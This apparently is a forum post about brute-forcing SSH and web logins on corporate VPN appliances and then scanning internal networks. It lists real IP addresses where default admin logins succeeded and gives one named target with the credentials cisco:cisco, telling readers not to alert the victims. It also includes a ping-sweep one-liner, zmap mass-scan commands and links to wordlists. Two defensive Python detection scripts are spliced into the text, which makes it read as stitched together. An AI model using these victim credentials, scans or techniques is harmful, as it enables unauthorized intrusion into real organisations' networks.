I will talk about brute force awareness in VPN products and about essential information that you should collect when accessing these products and how this information is important for you to better understand your position on the network. In this last part I will use as an example an environmental solutions company that is using CISCO ASA products to access the internal network.
This article will be divided into two parts
As we know, there are several manufacturers on the market that offer hardware with VPN support for a direct channel into internal corporate or non-corporate networks. Example solutions:
Cisco, Citrix, Juniper, Fortinet, Ivanti, Zyxel, Sonicwall.
But these are not the only ways to set up a VPN between two networks. More advanced home routers also support VPN. I don't see any great advantage in attacking these: they are rarely found in business environments, so I don't see the value in pursuing them for profit. These are some manufacturers:
Asus, tp-link, netgear, linksys, keenetic.
Returning to the large manufacturers mentioned as the first example, what these products have in common is the possibility of connecting to services generally enabled for remote management, for example SSH, TELNET, WEB Portal and FTP. Although brute force tools exist for these products, many only work by attacking the web portal that these services have. But what to do when the WEB service is not available? As you know, if we have other services running, we can attack from those services. Another point about brute force tools: many limit you to testing just one host. We explore what is vulnerable, so it is not feasible to attack just one host for initial access. In the case where you want to test multiple hosts, what you should do is test using a specific port for remote access. With this you will be able to test different hosts using common tools, such as the MSF module.
[attachment 3344]
As you noticed, the default username and password shown in the image above were tested first. To avoid wasting time, you can specify the default username and password to be tested first; if found, brute force will stop testing new users and passwords, and you already have a valid username and password to connect, but this is optional.
In short, if you are interested in brute force testing a product, know that the WEB service is not the only way to do this. You may think so because some tools only work through the WEB service.
Targets tested
[+] 187.8.225.193:22 - Success: 'admin:' '
[+] 200.148.178.191:22 - Success: 'admin:' '
[+] 189.20.42.17:22 - Success: 'admin:' '
[+] 179.175.37.106:22 - Success: 'admin:' '
[+] 186.249.239.246:22 - Success: 'admin:' '
[+] 189.109.225.161:22 - Success: 'admin:' '
[+] 200.218.185.98:22 - Success: 'admin:' '
[+] 187.8.225.193:22 - Success: 'admin:' '
[+] 179.175.51.56:22 - Success: 'admin:' '
[+] 179.175.37.106:22 - Success: 'admin:' '
[+] 179.175.5.134:22 - Success: 'admin:' '
[+] 200.232.59.1:22 - Success: 'admin:' '
[+] 177.61.163.209:22 - Success: 'admin:' '
[+] 177.61.162.29:22 - Success: 'admin:' '
[+] 177.12.231.153:22 - Success: 'admin:' '
[+] 168.227.194.252:22 - Success: 'admin:' '
[+] 168.227.192.178:22 - Success: 'admin:' '
[+] 168.227.192.119:22 - Success: 'admin:' '
[+] 168.227.192.86:22 - Success: 'admin:' '
[+] 138.36.22.225:22 - Success: 'admin:' '
[+] 187.85.82.54:22 - Success: 'admin:' '
[+] 45.235.17.94:22 - Success: 'admin:' '
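From the defender's side, the pattern shown above (one source trying a short list of vendor accounts against the SSH management port of many appliances, then logging in with a default account) is visible in the appliance's own login syslog. The Python below is an added example and is not code from this post or from Cisco: it parses constructed sample lines modeled on ASA login messages (605004 = login denied, 605005 = login permitted; the exact field layout used here is an assumption, so adapt the regex to what your devices actually emit), flags a source that exceeds a denial threshold inside a sliding window, flags a successful login from a source that was just flagged, flags any management login arriving on the outside interface, and flags any successful login with a vendor-default account name.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample syslog lines modeled on Cisco ASA login messages
# (605004 = login denied, 605005 = login permitted). The field layout is an
# assumption for this example; adapt LINE_RE to what your devices really emit.
SAMPLE_LOGS = """\
Mar 10 09:00:01 fw1 %ASA-6-605004: Login denied from 203.0.113.7/51000 to outside:198.51.100.2/ssh for user "admin"
Mar 10 09:00:02 fw1 %ASA-6-605004: Login denied from 203.0.113.7/51001 to outside:198.51.100.2/ssh for user "admin"
Mar 10 09:00:03 fw1 %ASA-6-605004: Login denied from 203.0.113.7/51002 to outside:198.51.100.2/ssh for user "cisco"
Mar 10 09:00:04 fw1 %ASA-6-605004: Login denied from 203.0.113.7/51003 to outside:198.51.100.2/ssh for user "root"
Mar 10 09:00:05 fw1 %ASA-6-605004: Login denied from 203.0.113.7/51004 to outside:198.51.100.2/ssh for user "admin"
Mar 10 09:00:06 fw1 %ASA-6-605005: Login permitted from 203.0.113.7/51005 to outside:198.51.100.2/ssh for user "admin"
Mar 10 09:30:00 fw1 %ASA-6-605005: Login permitted from 10.0.0.5/40000 to inside:10.0.0.1/ssh for user "netops"
Mar 10 10:00:00 fw1 %ASA-6-605004: Login denied from 10.0.0.9/40100 to inside:10.0.0.1/ssh for user "netops"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ %ASA-\d-(?P<msgid>60500[45]): '
    r'Login (?P<verdict>denied|permitted) from (?P<src>[\d.]+)/\d+ '
    r'to (?P<iface>\w+):(?P<dst>[\d.]+)/(?P<svc>\w+) for user "(?P<user>[^"]+)"'
)

# Account names that ship with the product or are guessed first by every tool;
# a successful login with one of these is a finding on its own.
VENDOR_DEFAULT_ACCOUNTS = {"admin", "cisco", "root"}


def parse(log_text):
    """Return a list of dicts, one per login event, in file order."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
            events.append(ev)
    return events


def analyze(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as dicts; log lines are assumed to be in time order."""
    alerts = []
    denials = defaultdict(list)   # src -> timestamps of recent denials
    flagged = set()               # sources already reported as brute forcing
    for ev in parse(log_text):
        src, ts = ev["src"], ev["ts"]
        if ev["verdict"] == "denied":
            recent = denials[src]
            recent.append(ts)
            # keep only the denials that fall inside the sliding window
            denials[src] = recent = [t for t in recent if ts - t <= window]
            if len(recent) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append({"rule": "ssh_bruteforce", "src": src,
                               "dst": ev["dst"], "count": len(recent)})
            continue
        # permitted login: three independent checks
        if src in flagged:
            alerts.append({"rule": "success_after_bruteforce", "src": src,
                           "dst": ev["dst"], "user": ev["user"]})
        if ev["iface"] == "outside":
            alerts.append({"rule": "mgmt_login_from_outside", "src": src,
                           "dst": ev["dst"], "user": ev["user"]})
        if ev["user"] in VENDOR_DEFAULT_ACCOUNTS:
            alerts.append({"rule": "default_account_used", "src": src,
                           "dst": ev["dst"], "user": ev["user"]})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOGS):
        print(alert)
```

On the sample input the script reports one brute-force burst from 203.0.113.7 followed by three findings on its successful login; the internal "netops" traffic produces nothing. The "mgmt_login_from_outside" rule is the one worth tuning first: on an appliance whose SSH is only reachable over the inside interface it should never fire at all, which is the configuration that makes the multi-host attack described in this post fail outright.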
For each product there is information to be collected; this information can help you proceed in the post-exploitation phase and show how you can be seen from an access point of view. I will show you: in this example we will connect to the Cisco VPN, from the Cisco ASA line. The target will be:
IP: 12.235.164.146
Product: Cisco ASA
user: cisco
pass: cisco
[attachment 3345]
Don't try to help them. The only thing you'll get is a kick in the ass. Just enjoy the access to learn.
Each VPN solution has a client to connect to. For cisco we use:
Cisco AnyConnect Secure Mobility Client
[link]
After installing the client we connect, like this:
[attachment 3346]
Connected:
[attachment 3347]
From this point, the first thing to do is list the routes that we can attack. This can be done with the route print -4 command, but it will only be useful to learn the IPv4 range format. From there we can do a ping scan to discover new routes.
Route format consulted with the route print -4 command
[attachment 3348]
We know the format of the range, and now we discover new routes by doing a ping scan, specifying the gateway address for each route, see:
for /l %i in (1,1,254) do @ping -n 1 -w 100 192.168.%i.1 | findstr "bytes=32"
[attachment 3349]
Although we can use the route print command to obtain the routes, the result can be confusing. Therefore, I recommend using Nirsoft's NetRouteView for this functionality.
Download: [link]
[attachment 3375]
We discovered 4 routes to attack, but not all routes have active hosts: the 192.168.40.0/24 route only has the gateway, so we will focus on the 192.168.3.0/24 route, which has several hosts. I will use NETSCAN to scan; you can use any one you prefer.
[attachment 3350]
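The route discovery above (one ping to the .1 address of every /24 in the range, from a VPN-assigned client address) is exactly what a per-user VPN access ACL should make impossible, and where it is allowed it still stands out in flow logs: one client address touching the gateway of dozens of subnets within seconds. The Python below is an added example, not from this post or from any of the tools it names. It works over constructed flow records (timestamp, source, destination; the three-column layout is an assumption, NetFlow/IPFIX or firewall logs carry the same fields), treats the .1 of a /24 as the gateway the way this thread does, and reports each source whose distinct gateway count inside a sliding window reaches a threshold.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ICMP flow records "timestamp source destination". The three-column
# layout is an assumption for this example. 192.168.200.15 plays the VPN client
# sweeping .1 addresses; 192.168.200.16 a client doing ordinary work on one subnet.
SAMPLE_FLOWS = "\n".join(
    [f"2024-03-10T09:00:{i:02d} 192.168.200.15 192.168.{i}.1" for i in range(1, 31)]
    + [
        "2024-03-10T09:05:00 192.168.200.16 192.168.3.25",
        "2024-03-10T09:05:01 192.168.200.16 192.168.3.1",
        "2024-03-10T09:05:02 192.168.200.16 192.168.40.1",
    ]
)


def parse_flows(text):
    """Return (timestamp, src, dst) tuples, dst as an IPv4Address."""
    records = []
    for line in text.splitlines():
        ts, src, dst = line.split()
        records.append((datetime.fromisoformat(ts), src, ipaddress.ip_address(dst)))
    return records


def gateway_network(dst):
    """Return the /24 if dst is its first usable host (.1), else None.

    Mirrors the thread's own heuristic of pinging x.y.z.1 for every candidate
    subnet; adjust if your gateways sit at another offset."""
    net = ipaddress.ip_network(f"{dst}/24", strict=False)
    return net if dst == net.network_address + 1 else None


def detect_gateway_sweep(records, threshold=10, window=timedelta(seconds=60)):
    """Map each sweeping source to the largest number of distinct /24 gateways
    it probed inside any one sliding window of the given length."""
    probes = defaultdict(list)            # src -> [(ts, /24), ...] in time order
    for ts, src, dst in sorted(records):
        net = gateway_network(dst)
        if net is not None:
            probes[src].append((ts, net))
    alerts = {}
    for src, seq in probes.items():
        recent = []
        for ts, net in seq:
            # slide the window forward, then count distinct subnets inside it
            recent = [(t, n) for t, n in recent if ts - t <= window] + [(ts, net)]
            distinct = len({n for _, n in recent})
            if distinct >= threshold:
                alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


if __name__ == "__main__":
    print(detect_gateway_sweep(parse_flows(SAMPLE_FLOWS)))
```

The client that only talks to its own subnet (plus one other gateway) never crosses the threshold, while the sweeping client is reported with all 30 gateways it touched. The same counting logic, keyed on destination hosts instead of gateways, covers the host scan of a single /24 that the post performs next with NETSCAN.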
Download the AnyConnect client and PuTTY, so we can proceed to the final part 2. To be continued...
[link] using [link] and simple word lists.
Scanning:
[link]:
zmap -p 443 -o targets_443.txt
zmap -p 10443 -o targets_10443.txt
CISCO
FORTI SSL VPN
Word lists:
Usernames:
users.txt: [link]
Passwords:
pass.txt: [link]
[link]